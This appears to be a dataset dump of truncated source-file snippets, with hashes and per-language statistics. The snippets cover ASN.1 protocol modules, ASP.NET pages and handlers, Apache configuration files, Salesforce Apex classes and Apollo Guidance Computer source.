-def proportion = ""0"" -def species = ""gambusia"" -def fishstandardlength = ""TBD"" -def round = ""7"" -def camera = ""FALSE"" -def node = ""master"" -def cam_node = ""master"" -def which_node = ""master"" -def cwtime = ""3.8"" -def ccwtime = ""3.8"" -def copydelay = ""0"" - -//********************************************************************** -//Read in jso","87","0.44387755102040816","0.0","0.0" -"19e9ddc961e636fc09a73007953b4188b3f14c80","stylesheet.dsl",".dsl","ASL"," - - - - - - -]]> - - -]]> - - -]]> - -]> - - - - - - - - - -(define draft-mode #f) - -(define pgsql-docs-list ""pgsql-docs@postgresql.org"") - -;; Don't show manpage volume numbers -(def","87","0.44387755102040816","0.0","0.0" -"14b93d2838270faa79a46071082bc7fcffb2a496","good7.asn",".asn","ASN.1","Seq-annot ::= { - desc { - region whole local str ""chr7"", - title ""Color by strand demonstration"", - name ""ColorByStrandDemo"", - user { - type str ""Track Data"", - data { - { - label str ""colorByStrand"", - data str ""255,0,0 0,0,255"" - }, - { - label str ""description"", - data str ""Color by strand demonstration"" - }, - { - label str ""name"", - data str ""ColorByStrandDemo"" - }, - { - label str ""visibility"", - data str ""2"" - } - } - }, - user { - type str ""NCBI_BED_COLUMN_COUNT"", - data { - { - label str ""NCBI_BED_COLUMN_COUNT"", - data int 6 - } - } - } - }, - data ftable { - { - id local id 1, - data region ""Pos1"", - location int { - from 127471196, - to 127472362, - strand plus, - id local str ""chr7"" - }, - exts { - { - type str ""DisplaySettings"", - ","59","1.0727272727272728","0.0","0.0" -"11eef720f3d729633386d1dbbf8b779d2b3c1c56","NBAP-PDU-Descriptions.asn",".asn","ASN.1","-- NBAP-PDU-Descriptions.asn --- --- Taken from 3GPP TS 25.433 V9.2.0 (2010-03) --- http://www.3gpp.org/ftp/Specs/archive/25_series/25.433/ --- --- 9.3.2 Elementary Procedure Definitions --- - --- ************************************************************** --- --- Elementary Procedure definitions --- --- ************************************************************** - -NBAP-PDU-Descriptions { -itu-t (0) identified-organization (4) etsi (0) mobileDomain (0) -umts-Access (20) modules (3) nbap (2) version1 (1) nbap-PDU-Descriptions (0) } - -DEFINITIONS AUTOMATIC TAGS ::= - -BEGIN - --- ************************************************************** --- --- IE parameter types from other modules. --- --- ************************************************************** - -IMPORTS - Criticality, - ProcedureID, - MessageDiscriminator, - TransactionID -FROM NBAP-CommonDataTypes - - CommonTransportChannelSetupRequestFDD, - CommonTransportChannelSetupRequestTDD, - CommonTransportChannelSetupResponse, - CommonTransportChannelSetupFa","59","1.0727272727272728","0.0","0.0" -"0eeafe37921fd3d7e1390e3f8c1e3e55aa156039","JoystickCommand.asn",".asn","ASN.1","---------------------------------------------------------------- ---! ASN file generated automatically by the SARGON ASN.1 generator - ---! Date/time of generation: 2017/01/04 00:43:06 ----------------------------------------------------------------- -JoystickNamedCommand-Types DEFINITIONS ::= -BEGIN -IMPORTS T-Int32, T-UInt32, T-Int8, T-UInt8, T-Boolean FROM TASTE-BasicTypes -T-Int64, T-UInt16, T-Double, T-Float, T-UInt64, T-String FROM TASTE-ExtendedTypes -Time FROM Time-Types; - --- String for name and axes -maxSize-JoystickString T-UInt32 ::= 25 -JoystickString ::= OCTET STRING (SIZE(0..maxSize-JoystickString)) - --- Max. number of axes -axesElementsMax T-UInt32 ::= 30 - - --- Definition AXESVECTOR Starts -AxesVector ::= -SEQUENCE -{ - names SEQUENCE (SIZE(0..axesElementsMax)) OF JoystickString, - elements SEQUENCE (SIZE(0..axesElementsMax)) OF T-Double -} --- Definition AXESVECTOR Ends - --- Max. number of axes -buttonElementsMax T-UInt32 ::= 30 - -ButtonVector ::= -SEQUENCE -{ - names","59","1.0727272727272728","0.0","0.0" -"0c2ed0b1878cb4796c50acc13138b01db9aaa24e","X841.asn",".asn","ASN.1","-- Module SIOsAccessControl-MODULE (X.841:10/2000) --- See also ITU-T X.841 (10/2000) --- See also the index of all ASN.1 assignments needed in this document - -SIOsAccessControl-MODULE {joint-iso-itu-t sios(24) specification(0) modules(0) - accessControl(0)} DEFINITIONS IMPLICIT TAGS ::= -BEGIN - --- EXPORTS All; -IMPORTS - id-at-clearance - FROM EnhancedSecurity {joint-iso-itu-t ds(5) module(1) enhancedSecurity(28) - 1} -- ITU-T Rec. X.501 | ISO/IEC 9594-2 - ATTRIBUTE, Name - FROM InformationFramework {joint-iso-itu-t ds(5) module(1) - informationFramework(1) 3} -- ITU-T Rec. X.501 | ISO/IEC 9594-2 - Extensions - FROM AuthenticationFramework {joint-iso-itu-t ds(5) module(1) - authenticationFramework(7) 3} -- ITU-T Rec. X.509 | ISO/IEC 9594-8 - DirectoryString{} - FROM SelectedAttributeTypes {joint-iso-itu-t ds(5) module(1) - selectedAttributeTypes(5) 3}; -- ITU-T Rec. X.520 | ISO/IEC 9594-6 - -id-ConfidentialityLabel OBJECT IDENTIFIER ::= - {joint-iso-itu-t sios(24","59","1.0727272727272728","0.0","0.0" -"0ce1acba606d30bdf5503bd70972ddd298f5334e","systemConfigH324m.asn",".asn","ASN.1","3G-324M-SYSTEM-CONFIGURATION ::= - -BEGIN - --- This ASN.1 file contains the settings of the main 3G-324m stack's configuration (system tree) - - - - --- *********************************************************************************************** --- --- 3G-324m Main stack configuration --- The SYSTEM tree --- --- *********************************************************************************************** - -3G324mConfiguration ::= SEQUENCE -{ - maxCalls INTEGER(1..2147483647), - -- The maximum number of concurrent calls allowed. - - maxTransmittingChannels INTEGER(0..30), - -- Number of transmitting media channels available per call. - - maxReceivingChannels INTEGER(0..30), - -- Number of receiving media channels available per call. - - allocations SEQUENCE - { - totalPvtNodes INTEGER(0.","59","1.0727272727272728","0.0","0.0" -"0d6a21297c436e561b91aadbb658cd6045bd0761","test.asn1",".asn1","ASN.1","-- $Id$ -- - -TEST DEFINITIONS ::= - -BEGIN - -IMPORTS heim_any FROM heim; - -TESTuint32 ::= INTEGER (0..4294967295) - -TESTLargeTag ::= SEQUENCE { - foo[127] INTEGER (-2147483648..2147483647), - bar[128] INTEGER (-2147483648..2147483647) -} - -TESTSeq ::= SEQUENCE { - tag0[0] INTEGER (-2147483648..2147483647), - tag1[1] TESTLargeTag, - tagless INTEGER (-2147483648..2147483647), - tag3[2] INTEGER (-2147483648..2147483647) -} - -TESTChoice1 ::= CHOICE { - i1[1] INTEGER (-2147483648..2147483647), - i2[2] INTEGER (-2147483648..2147483647), - ... -} - -TESTChoice2 ::= CHOICE { - i1[1] INTEGER (-2147483648..2147483647), - ... -} - -TESTInteger ::= INTEGER (-2147483648..2147483647) - -TESTInteger2 ::= [4] IMPLICIT TESTInteger -TESTInteger3 ::= [5] IMPLICIT TESTInteger2 - -TESTImplicit ::= SEQUENCE { - ti1[0] IMPLICIT INTEGER (-2147483648..2147483647), - ti2[1] IMPLICIT SEQUENCE { - foo[127] INTEGER (-2147483648..2147483647) - }, - ti3[2] IMPLICIT [5] IMPLICIT [4] IMPLICIT INTEGER (-2147483648..2147483647) -} - -TESTImplicit2 ::= SEQUEN","16","0.2909090909090909","0.0","0.0" -"0f247f0227e644ad9a2d886fb7cdc68f98a2c3a3","NGAP-PDU-Descriptions.asn1",".asn1","ASN.1","-- ************************************************************** --- --- Elementary Procedure definitions --- --- ************************************************************** - -NGAP-PDU-Descriptions { -itu-t (0) identified-organization (4) etsi (0) mobileDomain (0) -ngran-Access (22) modules (3) ngap (1) version1 (1) ngap-PDU-Descriptions (0)} - -DEFINITIONS AUTOMATIC TAGS ::= - -BEGIN - --- ************************************************************** --- --- IE parameter types from other modules. --- --- ************************************************************** - -IMPORTS - - Criticality, - ProcedureCode -FROM NGAP-CommonDataTypes - - AMFConfigurationUpdate, - AMFConfigurationUpdateAcknowledge, - AMFConfigurationUpdateFailure, - AMFStatusIndication, - CellTrafficTrace, - DeactivateTrace, - DownlinkNASTransport, - DownlinkNonUEAssociatedNRPPaTransport, - DownlinkRANConfigurationTransfer, - DownlinkRANStatusTransfer, - DownlinkUEAssociatedNRPPaTransport, - ErrorIndication, - HandoverCancel, - HandoverCancelAck","16","0.2909090909090909","0.0","0.0" -"06d82982b3ec127869fccd4ef899c32255080a5c","itu-t_x_x419_1999_MSAccessProtocol.asn1",".asn1","ASN.1"," - - - - -MSAccessProtocol (X.419:06/1999) - - --- Module MSAccessProtocol (X.419:06/1999) --- See also ITU-T X.419 (06/1999) --- See also the index of all ASN.1 assignments needed in this document - -MSAccessProtocol {joint-iso-itu-t mhs(6) protocols(0) modules(0) - ms-access-protocol(2) version-1999(1)} DEFINITIONS ::= -BEGIN - --- Prologue -IMPORTS - -- MS Abstract Service - ms-access-contract-88, ms-access-contract-94, ms-submission, retrieval, - retrieval-88 - --== - FROM MSAbstractService {joint-iso-itu-t mhs(6) ms(4) modules(0) - abstract-service(1) version-1999(1)} - -- Remote Operations - APPLICATION-CONTEXT - --== - FROM Remote-Operations-Information-Objects-extensions {joint-iso-itu-t - remote-operations(4) informationObjects-extensions(8) version1(0)} - Code - --== - FROM Remote-Operations-Information-Objects {joint-iso-itu-t - remote-operations(4) informationObjects(5) version1(0)} - Bind{}, InvokeId, Unbind{} - --== - FROM Remote-Operations-Generic-ROS-PDUs ","16","0.2909090909090909","0.0","0.0" -"11896339845b27eb64ac0c6b4ba214052bba6637","x2ap-15.2.0.asn1",".asn1","ASN.1","-- ************************************************************** --- --- Elementary Procedure definitions --- --- ************************************************************** - -X2AP-PDU-Descriptions { -itu-t (0) identified-organization (4) etsi (0) mobileDomain (0) -eps-Access (21) modules (3) x2ap (2) version1 (1) x2ap-PDU-Descriptions (0) } - -DEFINITIONS AUTOMATIC TAGS ::= - -BEGIN - --- ************************************************************** --- --- IE parameter types from other modules. --- --- ************************************************************** - -IMPORTS - Criticality, - ProcedureCode - -FROM X2AP-CommonDataTypes - - CellActivationRequest, - CellActivationResponse, - CellActivationFailure, - ENBConfigurationUpdate, - ENBConfigurationUpdateAcknowledge, - ENBConfigurationUpdateFailure, - ErrorIndication, - HandoverCancel, - HandoverReport, - HandoverPreparationFailure, - HandoverRequest, - HandoverRequestAcknowledge, - LoadInformation, - PrivateMessage, - Re","16","0.2909090909090909","0.0","0.0" -"124d2d53bd43448df6879d322dab662b15399f97","EC.asn1",".asn1","ASN.1","-- Copyright 2022 The OpenSSL Project Authors. All Rights Reserved. --- --- Licensed under the Apache License 2.0 (the ""License""). You may not use --- this file except in compliance with the License. You can obtain a copy --- in the file LICENSE in the source distribution or at --- https://www.openssl.org/source/license.html - --- ------------------------------------------------------------------- --- Taken from RFC 3279, 3 ASN.1 Module --- (https://www.rfc-editor.org/rfc/rfc3279.html#section-3) - -ansi-X9-62 OBJECT IDENTIFIER ::= { - iso(1) member-body(2) us(840) 10045 } - --- Arc for ECDSA signature OIDS - -id-ecSigType OBJECT IDENTIFIER ::= { ansi-X9-62 signatures(4) } - --- OID for ECDSA signatures with SHA-1 - -ecdsa-with-SHA1 OBJECT IDENTIFIER ::= { id-ecSigType 1 } - -id-publicKeyType OBJECT IDENTIFIER ::= { ansi-X9-62 keyType(2) } - -id-ecPublicKey OBJECT IDENTIFIER ::= { id-publicKeyType 1 } - --- Named Elliptic Curves in ANSI X9.62. - -ellipticCurve OBJECT IDENTIFIER ::= { ansi-X9-62 curves(3) ","16","0.2909090909090909","0.0","0.0" -"082469dfeb292928d9c9402064dbd920402fd948","Global.asax",".asax","ASP.NET","<%@ Application Codebehind=""Global.asax.cs"" Inherits=""MostLikely.MvcApplication"" Language=""C#"" %> -","1137","0.1221398646471157","0.0","0.0" -"00d1ba05c1a65de72faa84593f627b3bdb44ccb4","Global.asax",".asax","ASP.NET","<%@ Application Codebehind=""Global.asax.cs"" Inherits=""OneDriveWebhookTranslator.MvcApplication"" Language=""C#"" %> -","1137","0.1221398646471157","0.0","0.0" -"08ad11ade498bea048a0076761674eb7278caa5f","Global.asax",".asax","ASP.NET","<%@ Application Codebehind=""Global.asax.cs"" Inherits=""MvcSample.AngularJs.Web.MvcApplication"" Language=""C#"" %> -","1137","0.1221398646471157","0.0","0.0" -"100f58656e65c233a1c175b92c0058c52f9752b9","Global.asax",".asax","ASP.NET","<%@ Application Codebehind=""Global.asax.cs"" Inherits=""JavaScriptExercises.MvcApplication"" Language=""C#"" %> -","1137","0.1221398646471157","0.0","0.0" -"043cf695c494feb9b3d0932e790756dfd6f4c163","Global.asax",".asax","ASP.NET","<%@ Application Codebehind=""Global.asax.cs"" Inherits=""SPA_App.Global"" Language=""C#"" %> -","1137","0.1221398646471157","0.0","0.0" -"0de06c97c6fe166581d120a4d22af96c1d7b8e9c","Help.ascx",".ascx","ASP.NET","<%@ Control Language=""C#"" AutoEventWireup=""true"" CodeFile=""Help.ascx.cs"" Inherits=""CMSAdminControls_UI_PageElements_Help"" %> - - - - -","1131","0.12149532710280374","0.0","0.0" -"00a27cd99ee8367f672d1341e460646cfa2b365b","OpenAuthProviders.ascx",".ascx","ASP.NET","<%@ Control Language=""C#"" AutoEventWireup=""true"" CodeBehind=""OpenAuthProviders.ascx.cs"" Inherits=""ThreeHotel.Account.OpenAuthProviders"" %> - -
- Log in using another service - - - - - - - -
-

There are no external authentication services configured. See this article for details on setting up this ASP.NET application to support loggin","1131","0.12149532710280374","0.0","0.0" -"01425728dda436b6909a2e70cc96fdccb4421553","Navigation.ascx",".ascx","ASP.NET","<%@ Control Language=""C#"" Inherits=""System.Web.Mvc.ViewUserControl"" %> -

-
<%=Html.ActionLink(""Home"", ""Index"", ""Home"")%>
-
<%=Html.ActionLink(""Sessions"", ""Index"", ""Session"")%>
-
<%=Html.ActionLink(""Agenda"", ""Agenda"", ""Session"")%>
-
<%=Html.ActionLink(""Speakers"", ""Index"", ""Speaker"")%>
-
<%=Html.ActionLink(""Contact"", ""Contact"", ""Home"")%>
-
","1131","0.12149532710280374","0.0","0.0" -"0f564903d2be707792d0e9031e0ab8a957d1d5e4","OpenAuthProviders.ascx",".ascx","ASP.NET","<%@ Control Language=""C#"" AutoEventWireup=""true"" CodeBehind=""OpenAuthProviders.ascx.cs"" Inherits=""Lesson10a.Account.OpenAuthProviders"" %> - -
- Log in using another service - - - - - - - -
-

There are no external authentication services configured. See this article for details on setting up this ASP.NET application to support logging","1131","0.12149532710280374","0.0","0.0" -"1818ad7d4f76493fa70fa1f58c1ed9f003ae4b2b","CreateHyperLink.ascx",".ascx","ASP.NET","<%@ Assembly - Name=""CMSModules"" %> - -<%@ Control - Language=""C#"" - AutoEventWireup=""true"" - Inherits=""CMSModules.CreateHyperLink"" %> - -<%@ Import - Namespace=""LanguageRecords""%> - - - - - - - - - -
- <%=Language.Instance[""LocalLink"", null, ""Local link: ""] %> - - - -
- <%=Language.Instance[""URLToLink"", null, ""URL to link: ""] %> - - ","1131","0.12149532710280374","0.0","0.0" -"0fcd4712e11ca8c12b27f409b5ac025d76e36583","GetaMarksbyBound.ashx",".ashx","ASP.NET","<%@ WebHandler Language=""C#"" CodeBehind=""GetaMarksbyBound.ashx.cs"" Class=""Policesystem.Handle.GetaMarksbyBound"" %> -","228","0.024492426683854335","0.0","0.0" -"0ae2c52060a20aeeef47613cb640830a3dd38ace","MainHandler.ashx",".ashx","ASP.NET","<%@ WebHandler Language=""C#"" Class=""MainHandler"" %> - -using System; -using System.Web; -using ECI.DOUBLEE.BLL.DbElevent; -using ECI.DOUBLEE.Entity.Entity; -using System.Collections.Generic; -using ECI.DOUBLEE.Entity.ViewModel; - - -public class MainHandler : IHttpHandler { - DB_ELEVEN_MAIN_BLL bll = new DB_ELEVEN_MAIN_BLL(); - public void ProcessRequest (HttpContext context) { - context.Response.ContentType = ""text/plain""; - string action = context.Request[""action""]; - switch (action) - { - case ""pushCharts"": - PushCharts(); - break; - case ""backCharts"": - BackCharts(); - break; - case ""ESBMonitoring"": - ESBMonitoring(); - break; - case ""avgPushList"": - AvgPushList(); - break; - case ""avgImport"": - AvgImport(); - break; - case ""getAvgSend"": - GetAvgSend();","228","0.024492426683854335","0.0","0.0" -"0c007021dc4213c8f73c061f531f6d0ed1135b19","FriendsRequest.ashx",".ashx","ASP.NET","<%@ WebHandler Language=""C#"" Class=""FriendsRequest"" %> - -using System; -using System.Web; - -public class FriendsRequest : ServerResponse { - - protected override void Respond(HttpContext context) - { - MyDatabase mydb = new MyDatabase(); - - mydb.newQuery( - ""INSERT INTO [FriendRequests] ([sender_id], [receiver_id], [status], [send_date]) "" + - ""VALUES (@userid, @friendid, 'pending', GETDATE())"" - ); - mydb.setParameter(""userid"", context.Session[""user_id""].ToString()); - mydb.setParameter(""friendid"", context.Request[""friendId""].ToString()); - - mydb.ExecuteNonQuery(); - - } -}","228","0.024492426683854335","0.0","0.0" -"07606a8a588a4141c4582be03ce70bb601d0dd9b","fileDownload.ashx",".ashx","ASP.NET","<%@ WebHandler Language=""C#"" CodeBehind=""fileDownload.ashx.cs"" Class=""DigitalCampus.Web.Upload.fileDownload"" %> -","228","0.024492426683854335","0.0","0.0" -"035649be46ae0bdb8011bc28bf26188fbcb1405c","DemoPrintFileWithEncryptionHandler.ashx",".ashx","ASP.NET","<%@ WebHandler Language=""VB"" Class=""DemoPrintFileWithEncryptionHandler"" %> - -Imports System -Imports System.Web - -Imports Neodynamic.SDK.Web - -Public Class DemoPrintFileWithEncryptionHandler : Implements IHttpHandler - - - '############### IMPORTANT!!! ############ - ' If your website requires AUTHENTICATION, then you MUST configure THIS Handler file - ' to be ANONYMOUS access allowed!!! - '######################################### - - - Public Sub ProcessRequest(ByVal context As HttpContext) Implements IHttpHandler.ProcessRequest - - If WebClientPrint.ProcessPrintJob(context.Request.Url.Query) Then - Dim useDefaultPrinter As Boolean = (context.Request(""useDefaultPrinter"") = ""checked"") - Dim printerName As String = context.Server.UrlDecode(context.Request(""printerName"")) - - Dim fileType As String = context.Request(""filetype"") - - Dim fileName As String = (Guid.NewGuid().ToString(""N"") & ""."") + fileType - ","228","0.024492426683854335","0.0","0.0" -"044c510ca4f27fc10adc6befed625f26f7d9e669","SVAN_NFeRetRecepcao2.asmx",".asmx","ASP.NET"," - - - - - - - - - - - - -","111","0.011923944569771189","0.0","0.0" -"1c6bf932209411aec15ebefd76bd9d68b5835850","WorkFlowDeputize.asmx",".asmx","ASP.NET","<%@ WebService Language=""C#"" CodeBehind=""~/App_Code/WorkFlowDeputize.cs"" Class=""WorkFlowDeputize"" %> -","111","0.011923944569771189","0.0","0.0" -"068b90fd406b3e9c715834d09e8c29f368747e87","Drug.asmx",".asmx","ASP.NET","<%@ WebService Language=""C#"" CodeBehind=""~/App_Code/Drug.cs"" Class=""Drug"" %> -","111","0.011923944569771189","0.0","0.0" -"01497abd88f5278101ac162aef4cb75712ff8e38","WebService2.asmx",".asmx","ASP.NET","<%@ WebService Language=""C#"" CodeBehind=""WebService2.asmx.cs"" Class=""MedicalCare.WebService2"" %> -","111","0.011923944569771189","0.0","0.0" -"08ac16c77e1838d438f4ba4e79efbfb651d4d438","MembersPicture.aspx",".aspx","ASP.NET","<%@ Page Language=""C#"" AutoEventWireup=""true"" CodeFile=""MembersPicture.aspx.cs"" Inherits=""MembersPicture"" %> - - - - - - - - - - - About - Social Advice Website Template - - - - - - - - - - - - - - - - - - Builds, tests, and runs the project Hangman. - - - - - - - - Listen 443 - - - Listen 443 - - - - Options FollowSymLinks - AllowOverride None - Require all denied - - - - AllowOverride All - Require all granted - - -DocumentRoot /var/www/html - -AccessFileName .htaccess - - Require all denied - - -LogFormat ""%v:%p %h %l %u %t \""%r\"" %>s %O \""%{Referer}i\"" \""%{User-Agent}i\"""" vhost_combined -LogFormat ""%h %l %u %t \""%r\"" %>s %O \""%{Referer}i\"" \""%{User-Agent}i\"""" combined -LogFormat ""%h %l %u %t \""%r\"" %>s %O"" common -LogFormat ""%{Referer}i -> %U"" referer -LogFormat ""%{User-agent}i"" agent - -CustomLog /proc/self/fd/1 ","106","0.08191653786707882","0.0","0.0" -"0fdc93d55759f767e95072d01f086d2476bbac35","000-default.conf",".conf","ApacheConf"," - # The ServerName directive sets the request scheme, hostname and port that - # the server uses to identify itself. This is used when creating - # redirection URLs. In the context of virtual hosts, the ServerName - # specifies what hostname must appear in the request's Host: header to - # match this virtual host. For the default virtual host (this file) this - # value is not decisive as it is used as a last resort host regardless. - # However, you must set it for any further virtual host explicitly. - #ServerName www.example.com - - ServerAdmin webmaster@localhost - DocumentRoot /var/www/html - - # Available loglevels: trace8, ..., trace1, debug, info, notice, warn, - # error, crit, alert, emerg. - # It is also possible to configure the loglevel for particular - # modules, e.g. - #LogLevel info ssl:warn - - ErrorLog ${APACHE_LOG_DIR}/error.log - CustomLog ${APACHE_LOG_DIR}/access.log combined - - # For most configuration files from conf-available/, which are - # enabled or disabled at a g","106","0.08191653786707882","0.0","0.0" -"06c412c328bc541af9fa6eebf16150b78618d6ba","apache2.conf",".conf","ApacheConf","# This is the main Apache server configuration file. It contains the -# configuration directives that give the server its instructions. -# See http://httpd.apache.org/docs/2.4/ for detailed information about -# the directives and /usr/share/doc/apache2/README.Debian about Debian specific -# hints. -# -# -# Summary of how the Apache 2 configuration works in Debian: -# The Apache 2 web server configuration in Debian is quite different to -# upstream's suggested way to configure the web server. This is because Debian's -# default Apache2 installation attempts to make adding and removing modules, -# virtual hosts, and extra configuration directives as flexible as possible, in -# order to make automating the changes and administering the server as easy as -# possible. - -# It is split into several files forming the configuration hierarchy outlined -# below, all located in the /etc/apache2/ directory: -# -# /etc/apache2/ -# |-- apache2.conf -# | `-- ports.conf -# |-- mods-enabled -# | |-- *.load -# | `-- *.conf -","106","0.08191653786707882","0.0","0.0" -"01e315ac2943aa5c74a527d19b93d8d0b3ea6998","org-ids-redirect.conf",".conf","ApacheConf","# vi: ft=apache - - - ServerName www.org-id.guide - Redirect / http://org-id.guide/ - -","106","0.08191653786707882","0.0","0.0" -"08cdae682cb64f2b030598d91c2df7b2b8b17f7b","httpd.conf",".conf","ApacheConf","# -# This is the main Apache HTTP server configuration file. It contains the -# configuration directives that give the server its instructions. -# See for detailed information. -# In particular, see -# -# for a discussion of each configuration directive. -# -# Do NOT simply read the instructions in here without understanding -# what they do. They're here only as hints or reminders. If you are unsure -# consult the online docs. You have been warned. -# -# Configuration and logfile names: If the filenames you specify for many -# of the server's control files begin with ""/"" (or ""drive:/"" for Win32), the -# server will use that explicit path. If the filenames do *not* begin -# with ""/"", the value of ServerRoot is prepended -- so ""logs/access_log"" -# with ServerRoot set to ""/usr/local/apache2"" will be interpreted by the -# server as ""/usr/local/apache2/logs/access_log"", whereas ""/logs/access_log"" -# wil","106","0.08191653786707882","0.0","0.0" -"07abd167995d8ff6228867174828adbec3a3a325",".htaccess",".htaccess","ApacheConf","Options FollowSymLinks -AddDefaultCharset utf-8 - - - RewriteEngine On - - # the main rewrite rule for the frontend application - RewriteCond %{REQUEST_URI} !^/(backend/web|admin|storage/web|storage) - RewriteRule !^frontend/web /frontend/web%{REQUEST_URI} [L] - - # redirect to the page without a trailing slash (uncomment if necessary) - #RewriteCond %{REQUEST_URI} ^/admin/$ - #RewriteRule ^(admin)/ /$1 [L,R=301] - # the main rewrite rule for the backend application - RewriteCond %{REQUEST_URI} ^/admin - RewriteRule ^admin(.*) /backend/web/$1 [L] - - # redirect to the page without a trailing slash (uncomment if necessary) - #RewriteCond %{REQUEST_URI} ^/storage/$ - #RewriteRule ^(storage)/ /$1 [L,R=301] - # the main rewrite rule for the storage application - RewriteCond %{REQUEST_URI} ^/storage - RewriteRule ^storage(.*)$ /storage/web/$1 [L] - - # if a directory or a file of the frontend application exists, use the request directly - R","1225","0.9466769706336939","0.0","0.0" -"01bc21c285eb248c3dd5d36f9480c94a62095086",".htaccess",".htaccess","ApacheConf","Options -MultiViews -RewriteEngine On - -RewriteBase /jag_mvc/public - -RewriteCond %{REQUEST_FILENAME} !-d -RewriteCond %{REQUEST_FILENAME} !-f - -RewriteRule ^(.+)$ index.php?url=$1 [QSA,L] -","1225","0.9466769706336939","0.0","0.0" -"0a986b06ca23e4a49d34b4721de18a10d4d24f9f",".htaccess",".htaccess","ApacheConf","Options +FollowSymLinks -IndexIgnore */* -# Turn on the RewriteEngine -RewriteEngine On -# Rules -RewriteCond %{REQUEST_FILENAME} !-f [OR] -RewriteCond %{REQUEST_FILENAME} !-d -RewriteRule . index.php -","1225","0.9466769706336939","0.0","0.0" -"0eb10b0ec8692e31c95e2f0ab58030a63913ba4c",".htaccess",".htaccess","ApacheConf","RewriteEngine On -#RewriteBase /user6/booker/server/api/rooms/ -RewriteBase /~user6/booker/server/api/rooms/ -RewriteCond %{REQUEST_FILENAME} !-f -RewriteCond %{REQUEST_FILENAME} !-d -RewriteRule ^.*$ index.php -DirectoryIndex index.php -","1225","0.9466769706336939","0.0","0.0" -"0113d4a3b6b23835e4a2da45e5c4ea73337ebcd4",".htaccess",".htaccess","ApacheConf","#Options +FollowSymLinks - -#IndexIgnore */* - -RewriteEngine on -RewriteCond %{REQUEST_FILENAME} !-f -RewriteCond %{REQUEST_FILENAME} !-d -RewriteRule . index.php","1225","0.9466769706336939","0.0","0.0" -"0f5d8d6ca33290342bdcbe8970166c8ebd3b4b72","MDLCardMedia.cls",".cls","Apex","""Filed out from Dolphin Smalltalk 7""! - -MDLCardInnerDiv subclass: #MDLCardMedia - instanceVariableNames: '' - classVariableNames: '' - poolDictionaries: '' - classInstanceVariableNames: ''! -MDLCardMedia guid: (GUID fromString: '{10355c51-b395-43ef-8d0a-96a57a203da9}')! -MDLCardMedia comment: 'Description -------------------- I am a brush to create a medias in a card.'! -!MDLCardMedia categoriesForClass!Material-Design-Lite-Components-Cards! ! -!MDLCardMedia methodsFor! - -initialize super initialize. self class: 'mdl-card__media'! ! -!MDLCardMedia categoriesFor: #initialize!initialization!public! ! - -","1676","1.0377708978328173","0.0","0.0" -"018a2ca6f0a6de5b796f8f1f56c367a09e282600","DaysToPayService.cls",".cls","Apex","public with sharing class DaysToPayService -{ - - public map> mCustPymntToOpenInvoice = new map>(); - public map mCustPymntToDTP = new map(); - public set mCustPymntKeys = new set(); - public list updateList = new list(); - public list custPayWithoutDTPList = new list(); - public list ConsolidatedUpdateList = new list(); - public list custWithoutPaymentList = new list(); - public list ClosedCIByCustPayList = new list(); - public list AllCompClosedCI = new list(); - public Decimal DTPTotal =0.0; - public Id CompanyId; - public set QueryFields = new set{'id','name','Bill_To_Customer__c' ,'Payment_Term__c','P","1676","1.0377708978328173","0.0","0.0" -"0c23c5b93b27001dd8595dce00d2f7d16b4dd9eb","AccountPlans.cls",".cls","Apex","global class AccountPlans { - webservice String area; - webservice String region; - - //Define an object in apex that is exposed in apex web service - - global class Plan { - webservice String name; - webservice Integer planNumber; - webservice Date planningPeriod; - webservice Id planId; - } - webservice static Plan createAccountPlan(Plan vPlan) { - - //A plan maps to the Account object in salesforce.com. - //So need to map the Plan class object to Account standard object - Account acct = new Account(); - acct.Name = vPlan.name; - acct.AccountNumber = String.valueOf(vPlan.planNumber); - insert acct; - - vPlan.planId=acct.Id; - return vPlan; - - } - -}","1676","1.0377708978328173","0.0","0.0" -"084295c904858a8567aef569120bcab2e687e973","Bestellvorschlag.cls",".cls","Apex","global class Bestellvorschlag { - - public static list Prod=new list(); - public static list Einkauf=new list(); - public static map>>>> EinkaufBestellung =new map>>>>(); - public static list EBtoInsert = new list(); -// public static list PS=new list(); - - webservice static String init(list ArtikelIds) { - Prod = [Select id, BEME01__c, Gueltiger_Einkaufspreis__c, Kreditor__c, Liefertermin__c, BESB01__c, PDKZ01__c, Typ__c, AUSW01__c, PJKZ01__c, SWFA01__c, AZME01__c, - MEDA01__r.Name, Isactive, Bestandsmeldung__c, Name, IVKZ01__c from Product2 where Id IN: ArtikelIds]; - system.debug('ARTIKEL IDS ' + ArtikelIds); - - String m = Einkauf_Bestellung(); - if(m != 'true') { - return m; - } - - m = match()","1676","1.0377708978328173","0.0","0.0" -"0cf390d93d0397731164e8ba1aa8410f1eb5814d","SelectDispatchPointController.cls",".cls","Apex","public with sharing class SelectDispatchPointController { - - //--------------------------- Parameters ----------------------------// - public string HaHa {get;set;} - public string StrMul{get;set;} - public string TotalCount {get;set;} - public string strDispatchId {get;set;} - public string ShowFewerUrl {get;set;} - public string ShowMoreUrl {get;set;} - public Set StoreIdSet = new Set(); - public Set DispatchIdList = new Set(); - - //--------------------------- Bind List ----------------------------// - public List OrderLineItemList {get; set;} - public List ProductList {get; set;} - public Map StoreIdNameMap = new Map(); - - //--------------------------- Page Init ----------------------------// - public PageReference Init(){ - string orderId = ApexPages.currentPage().getParameters().get('id'); - OrderLineItemList = GetOrderLineItems(orderId); - if(ApexPages.currentPage().getParameters().get('page') != ","1676","1.0377708978328173","0.0","0.0" -"0d01f73d18e233c31e81fdecdf14478637b06c69","SPS_BACK-UP_RCS_CONTROL.agc",".agc","Apollo Guidance Computer","### FILE=""Main.annotation"" -## Copyright: Public domain. -## Filename: SPS_BACK-UP_RCS_CONTROL.agc -## Purpose: A section of Luminary revision 98. -## It is part of the reconstructed source code for the a -## development version of the flight software for the Lunar -## Module's (LM) Apollo Guidance Computer (AGC) for Apollo 11. -## The code has been recreated from a copy of Luminary 99 -## revision 001, using asterisks indicating changed lines in -## the listing and Luminary Memo #85, which lists changes between -## Luminary 98 and 99. -## Reference: pp. 1507-1510 -## Assembler: yaYUL -## Contact: Ron Burkey . -## Website: www.ibiblio.org/apollo/index.html -## Mod history: 2019-07-28 MAS Created from Luminary 99. - -## Page 1507 -# PROGRAM NAME: SPSRCS -# AUTHOR: EDGAR M. OSHIKA (AC ELECTRONICS) -# MODIFIED: TO RETURN TO ALL AXES VIA Q BY P. S. WEISSMAN, OCT 7, 1968 -# MOD","37","0.9736842105263158","0.0","0.0" -"065a8c91a609c6abfc96f8acb7f367ad983da3a6","DUMMY_206_INITIALIZATION.agc",".agc","Apollo Guidance Computer","### FILE=""Main.annotation"" -## 